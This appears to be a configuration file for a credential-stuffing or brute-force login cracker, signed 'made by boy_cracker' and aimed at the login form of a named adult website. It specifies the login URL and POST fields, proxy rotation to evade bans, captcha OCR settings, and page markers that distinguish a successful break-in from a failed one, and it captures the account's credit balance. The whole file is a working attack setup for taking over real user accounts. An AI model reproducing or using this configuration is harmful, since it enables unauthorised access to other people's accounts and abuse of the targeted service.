[Wordlist]
made by boy_cracker=1
[Settings]
SiteURL=http://tour.brazzersreel.com/login
Timeout=10
WaitBot=0
ResolveHost=0
UserPass=0
ComboFilter=0
ComboMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
RequestMethod=2
Referer=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=username=<USER>&password=<PASS>
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=0
[Form]
Username=username
Password=password
AddData=
Action=http://www.brazzersreel.com/tour/?action=login
Cookie=
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=http://www.brazzersreel.com/membersa
FormRedirectCondition=Location: ../membersa/
DataDesc=Credit=Credits()
CaptureParsingCode=<span>$|</span>&
RefreshSession=0
RefreshCookie=0
GetAnswer=0
GetAnswerAjax=0
FormHeader=0
AjaxHeader=0
Recursive=0
ImageAfterAjax=0
blnBasic=0
[OCR]
OCRMode=0
URLMode=0
ImageURLID=
Captcha=
FixedImageURL=
OCRKey=
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
blnCompute=0
RefreshCaptcha=0
blnBorderPre=0
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
[Ajax]
Variables=
PostElements=
RedURL=
[Keywords]
HeaderFail=Location: ?action=unauth
HeaderSuccess=
HeaderBan=
HeaderRetry=
SourceFail=
SourceSuccess=>Log out<
SourceBan=
SourceRetry=
EnableHeaderFail=1
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderRetry=0
EnableSourceFail=0
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceRetry=0
EnableGlobalSourceRetry=1